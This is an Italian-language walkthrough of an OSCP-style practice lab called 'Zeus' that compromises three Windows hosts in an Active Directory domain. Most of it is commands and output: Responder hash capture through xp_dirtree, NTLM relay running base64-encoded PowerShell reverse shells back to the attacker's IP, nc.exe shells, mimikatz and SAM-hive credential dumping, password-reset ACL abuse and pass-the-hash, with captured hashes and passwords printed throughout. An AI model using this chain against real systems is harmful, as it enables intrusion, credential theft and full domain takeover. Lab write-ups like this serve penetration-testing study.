Vai al contenuto

Zeus

Challenge 7 - Zeus

Network

NAME IP
VM01 192.168.229.158
VM02 192.168.229.159
VM03 192.168.229.160

Domain

VM01

ENUMERATION

Ports
PORT SERVICE VERSION
53/tcp domain Simple DNS Plus
88/tcp kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-01 14:30:20Z)
135/tcp msrpc Microsoft Windows RPC
139/tcp netbios-ssn
389/tcp ldap Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
445/tcp microsoft-ds
464/tcp kpasswd5
593/tcp http-rpc-epmap Microsoft Windows RPC over HTTP 1.0
636/tcp ldapssl Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
1433/tcp ms-sql-s Microsoft SQL Server 2019 15.00.2000
3268/tcp globalcatLDAP Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
3269/tcp globalcatLDAP Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
5985/tcp wsman Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp adws .NET Message Framing
49667/tcp unknown Microsoft Windows RPC
49669/tcp unknown Microsoft Windows RPC
49670/tcp unknown Microsoft Windows RPC
49672/tcp unknown Microsoft Windows RPC
49690/tcp unknown Microsoft Windows RPC
54379/tcp unknown Microsoft Windows RPC
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM01]
└─$ sudo nmap -sS -p- vm01.oscp.exam | tee nmap_ss.txt                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:24 CET
Nmap scan report for vm01.oscp.exam (192.168.229.158)
Host is up (0.056s latency).
Not shown: 65515 filtered tcp ports (no-response)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49672/tcp open  unknown
49690/tcp open  unknown
54379/tcp open  unknown
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM01]
└─$ sudo nmap -sV -p53,88,135,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49670,49672,49690,54379 --script="vuln" vm01.oscp.exam | tee nmap_sv.txt 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 15:29 CET
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for vm01.oscp.exam (192.168.229.158)
Host is up (0.071s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-01 14:30:20Z)
135/tcp   open  msrpc         Microsoft Windows RPC
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000
|_tls-ticketbleed: ERROR: Script execution failed (use -d to debug)
| vulners: 
|   cpe:/a:microsoft:sql_server:2019: 
|       CVE-2023-36785  7.8     https://vulners.com/cve/CVE-2023-36785
|_      CVE-2022-23276  7.8     https://vulners.com/cve/CVE-2022-23276
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: zeus.corp0., Site: Default-First-Site-Name)
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
49672/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
54379/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 472.42 seconds

VM02

ENUMERATION

Ports
PORT SERVICE VERSION
135/tcp msrpc
139/tcp netbios-ssn
445/tcp microsoft-ds
5040/tcp unknown
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
└─$ sudo nmap -Pn -p- -oN alltcp_ports.txt vm02.oscp.exam    
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:26 CET
Nmap scan report for vm02.oscp.exam (192.168.229.159)
Host is up (0.066s latency).
Not shown: 65524 closed tcp ports (reset)
PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49673/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 77.76 seconds
Enum4linux
  • sudo enum4linux -w zeus -u guest -p ''

Monosnap Debian 12.x 64-bit_kali 2024-12-01 18-26-25.png

SMB

  • Connessione alla cartella

    Bash
    ┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
└─$ sudo smbclient -U 'zeus\guest' \\\\192.168.229.159\\SQL
Password for [ZEUS\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Jun 26 23:00:11 2022
  ..                                  D        0  Sun Jun 26 23:00:11 2022
  connection.sql                      A      528  Sun Jun 26 22:53:00 2022

                12424538 blocks of size 4096. 7116275 blocks available
smb: \> get connection.sql
getting file \connection.sql of size 528 as connection.sql (1.9 KiloBytes/sec) (average 1.9 KiloBytes/sec)
smb: \>

  • Controllo il contenuto di connection.sql:

    Bash
    ┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM02]
└─$ cat connection.sql  
$SqlServer    = 'DC01'
$Database     = 'master'
$SqlAuthLogin = 'zeus.corp\db_user'
$SqlAuthPw    = 'Password123!'
# query to show changes
$Query = '
SELECT @@SERVERNAME AS [ServerName]
    , des.login_name
    , DB_NAME()   AS [DatabaseName]
    , dec.net_packet_size
    , @@LANGUAGE  AS [Language]
    , des.program_name
    , des.host_name
FROM sys.dm_exec_connections dec
JOIN sys.dm_exec_sessions des ON dec.session_id = des.session_id
WHERE dec.session_id = @@SPID
'

### Add Additional queries here ###

Monosnap Debian 12.x 64-bit_kali 2024-12-01 18-27-20.png

VM03

ENUMERATION

Ports
PORT SERVICE VERSION
135/tcp msrpc Microsoft Windows RPC
139/tcp netbios-ssn Microsoft Windows netbios-ssn
445/tcp microsoft-ds
5040/tcp unknown
7680/tcp pando-pub
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM03]
└─$ sudo nmap -Pn -sV -p- -oN alltcp_ports_sV.txt vm03.oscp.exam
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:23 CET
Nmap scan report for vm03.oscp.exam (192.168.229.160)
Host is up (0.073s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.01 seconds
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus/VM03]
└─$ sudo nmap -Pn -sU -sV -sC --top-ports=20 -oN top_20_udp_nmap.txt $ip
[sudo] password for momphucker: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-01 16:57 CET
Nmap scan report for vm03.oscp.exam (192.168.229.160)
Host is up (0.059s latency).

PORT      STATE         SERVICE      VERSION
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    closed        dhcpc
69/udp    closed        tftp
123/udp   open|filtered ntp
135/udp   closed        msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   open|filtered isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp closed        unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 234.53 seconds

EXPLOITATION

Avvio Responder sull'interfaccia tun0

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo responder -I tun0

Eseguo una richiesta samba dal database verso la mia macchina 192.168.45.176:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo sqsh -S 192.168.229.158 -U 'zeus\db_user' -P 'Password123!' -D 'master'
[sudo] password for momphucker: 
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
(0 rows affected, return status = 0)
1> EXEC xp_dirtree '\\192.168.45.176\tesaweft';
2> go

E nella risposta

Bash
[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [192.168.45.176]
    Responder IPv6             [fe80::5b8e:8732:5dbf:e97c]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-ZH00DPWLND8]
    Responder Domain Name      [XSAT.LOCAL]
    Responder DCE-RPC Port     [45862]

[+] Listening for events...                                                                                                                                                     

[SMB] NTLMv2-SSP Client   : 192.168.229.158
[SMB] NTLMv2-SSP Username : zeus\svc_mssql$
[SMB] NTLMv2-SSP Hash     : svc_mssql$::zeus:ed1c6b5eb251466d:2967457F299EEFCFBB5E3A1245E158E1:0101000000000000805D48AB3A44DB01CE576C3C004B6AAF0000000002000800580053004100540001001E00570049004E002D005A004800300030004400500057004C004E004400380004003400570049004E002D005A004800300030004400500057004C004E00440038002E0058005300410054002E004C004F00430041004C000300140058005300410054002E004C004F00430041004C000500140058005300410054002E004C004F00430041004C0007000800805D48AB3A44DB010600040002000000080030003000000000000000000000000030000011B53EC152F206B8712C3A180A4F72798D52488282831DB732971B010B6FE3E70A001000000000000000000000000000000000000900260063006900660073002F003100390032002E003100360038002E00340035002E003100370036000000000000000000

Monosnap Debian 12.x 64-bit_kali 2024-12-01 21-53-18.png

Il server mssql esegue quindi la chaiamata come svc_mssql$.

A questo punto apro un listener con nc -nvlp 4455:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4455     
listening on [any] 4455 ...

ed eseguo una reverse shell con impacket-ntlmrelayx:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.229.158 -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwA2ACIALAA0ADQANQA1ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="

A questo punto vengo loggato sulla vm02 come SYSTEM:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4455     
listening on [any] 4455 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.159] 53671

PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32>

La shell risulta essere molto instabile, quindi apro una nuova reverse shell (dopo aver importato nc.exe) come SYSTEM. Apro un nuovo listener:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ nc -nvlp 4444
Bash
PS C:\windows\temp\wintools> .\nc.exe 192.168.45.176 4444 -e powershell

Recupero la flag:

Bash
PS C:\users\administrator\desktop> type proof.txt
type proof.txt
f1ff860ac615273bd52d2ba0d4043ccd
PS C:\users\administrator\desktop> whoami
whoami
nt authority\system
PS C:\users\administrator\desktop> ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.229.159
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254
PS C:\users\administrator\desktop>

Monosnap Debian 12.x 64-bit_kali 2024-12-01 23-13-54.png

Ora lancio, dopo averlo caricato, mimikatz.exe

Bash
S C:\windows\temp\wintools> .\mimikatz.exe
.\mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

E tra i vari risultati trovo delle credenziali:

Bash
Authentication Id : 0 ; 261676 (00000000:0003fe2c)
Session           : Service from 0
User Name         : o.foller
Domain            : zeus
Logon Server      : DC01
Logon Time        : 11/26/2024 9:16:51 PM
SID               : S-1-5-21-2826791697-1341466529-4139912853-10601
        msv :
         [00000003] Primary
         * Username : o.foller
         * Domain   : zeus
         * NTLM     : decca5b9babc228de4cedeb29a6b9abf
         * SHA1     : d570701c87b24e555619ccd3a9aadeb12c126629
         * DPAPI    : f675788d44c8293071ee2cabde5fb136
        tspkg :
        wdigest :
         * Username : o.foller
         * Domain   : zeus
         * Password : (null)
        kerberos :
         * Username : o.foller
         * Domain   : ZEUS.CORP
         * Password : EarlyMorningFootball777
        ssp :
        credman :
        cloudap :

Eseguo crackmapexec sulla macchin 192.168.229.160:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo crackmapexec smb 192.168.229.160 -d 'zeus' -u o.foller -p 'EarlyMorningFootball777' -x whoami
[sudo] password for momphucker: 
SMB         192.168.229.160 445    CLIENT02         [*] Windows 10 / Server 2019 Build 19041 x64 (name:CLIENT02) (domain:zeus) (signing:False) (SMBv1:False)
SMB         192.168.229.160 445    CLIENT02         [+] zeus\o.foller:EarlyMorningFootball777 (Pwn3d!)
SMB         192.168.229.160 445    CLIENT02         [+] Executed command 
SMB         192.168.229.160 445    CLIENT02         zeus\o.foller

Monosnap Debian 12.x 64-bit_kali 2024-12-01 23-05-20.png

Adesso apro una shell tramite smb usando impacket-psexec:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE/Challenge_7_Zeus]
└─$ sudo impacket-psexec 'zeus/o.foller':'EarlyMorningFootball777'@192.168.229.160
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.229.160.....
[*] Found writable share ADMIN$
[*] Uploading file thhSYeWP.exe
[*] Opening SVCManager on 192.168.229.160.....
[*] Creating service Hrup on 192.168.229.160.....
[*] Starting service Hrup.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.631]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
Bash
c:\Users\Administrator\Desktop> type proof.txt
22d0f0efc53590883fde4ce5f42638f4

c:\Users\Administrator\Desktop> whoami
nt authority\system

c:\Users\Administrator\Desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.229.160
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254

Monosnap Debian 12.x 64-bit_kali 2024-12-01 23-14-54.png

Sulla macchina è presente il file c:\Users\z.thomas\Downloads\Onboarding Document.docx e al suo interno sono riportate le seguenti credenziali: - username:z.thomas - password:^1+>pdRLwyct]j,CYmyi

Con queste credenziali mi connetto al DC tramite evil-winrm:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo evil-winrm -i 192.168.229.158 -u z.thomas     
[sudo] password for momphucker: 
Enter Password: 

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\z.thomas\Documents>

A questo punto apro una reverse shell interativa sul listener in ascolto sulla 4466:

Bash
*Evil-WinRM* PS C:\Users\z.thomas\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwA2ACIALAA0ADQANgA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==
Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4466     
listening on [any] 4466 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54552

PS C:\Users\z.thomas\Documents> whoami
zeus\z.thomas
PS C:\Users\z.thomas\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\z.thomas\Documents>

Recupero la flag local:

Bash
PS C:\Users\z.thomas\desktop> type local.txt
fa0ba8106cbab68d4a11e61fbad09ab9
PS C:\Users\z.thomas\desktop> whoami
zeus\z.thomas
PS C:\Users\z.thomas\desktop> ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0 2:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::c758:61d8:60d:1552%12
   IPv4 Address. . . . . . . . . . . : 192.168.229.158
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.229.254

Monosnap Debian 12.x 64-bit_kali 2024-12-01 23-32-14.png

L'utente z.thomas può cambiare la password degli utenti, cambio quella di d.chambers :

Bash
PS C:\Users\z.thomas\desktop\wintools> Get-ObjectAcl -Identity "d.chambers" -ResolveGUIDs
Bash
AceQualifier           : AccessAllowed
ObjectDN               : CN=Donna Chambers,CN=Users,DC=zeus,DC=corp
ActiveDirectoryRights  : ExtendedRight
ObjectAceType          : User-Change-Password
ObjectSID              : S-1-5-21-2826791697-1341466529-4139912853-1107
InheritanceFlags       : None
BinaryLength           : 40
AceType                : AccessAllowedObject
ObjectAceFlags         : ObjectAceTypePresent
IsCallback             : False
PropagationFlags       : None
SecurityIdentifier     : S-1-1-0
AccessMask             : 256
AuditFlags             : None
IsInherited            : False
AceFlags               : None
InheritedObjectAceType : All
OpaqueLength           : 0

Riapro una reverse shell con le sue credenziali appena resettate: - username: d.chambers - password: Aa.123456!

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ nc -nvlp 4466
listening on [any] 4466 ...
connect to [192.168.45.176] from (UNKNOWN) [192.168.229.158] 54849

PS C:\Users\d.chambers\Documents> whoami
zeus\d.chambers
PS C:\Users\d.chambers\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
PS C:\Users\d.chambers\Documents>

Sfrutto i privileggi SeBackupPrivilege SeRestorePrivilege e come riportato nella guida https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/

Mi collego al DC tramite evil-wirm:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo evil-winrm -i 192.168.229.158 -u d.chambers         
Enter Password: 

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\d.chambers\Documents>

Procedo con i segunti passaggi:

Bash
cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

Salvo i file sam e system sulla macchina kali:

Bash
cd Temp
download sam
download system

Monosnap Debian 12.x 64-bit_kali 2024-12-02 01-29-08.png

Eseguo:

Bash
┌──(momphucker㉿kali-mbpro15)-[~/Desktop/OSCP_CHALLENGE]
└─$ sudo pypykatz registry --sam sam system

Monosnap Debian 12.x 64-bit_kali 2024-12-02 01-31-17.png

In questo ho recuperato l'hash dell'utente Administrator e lo uso per collegarmi tramite evil-winrm. Creo un nuova reverse shell sul listener in ascolto sulla porta 4477:

Text Only
*Evil-WinRM* PS C:\Users\Administrator\Documents> powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADEANwA2ACIALAA0ADQANwA3ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsA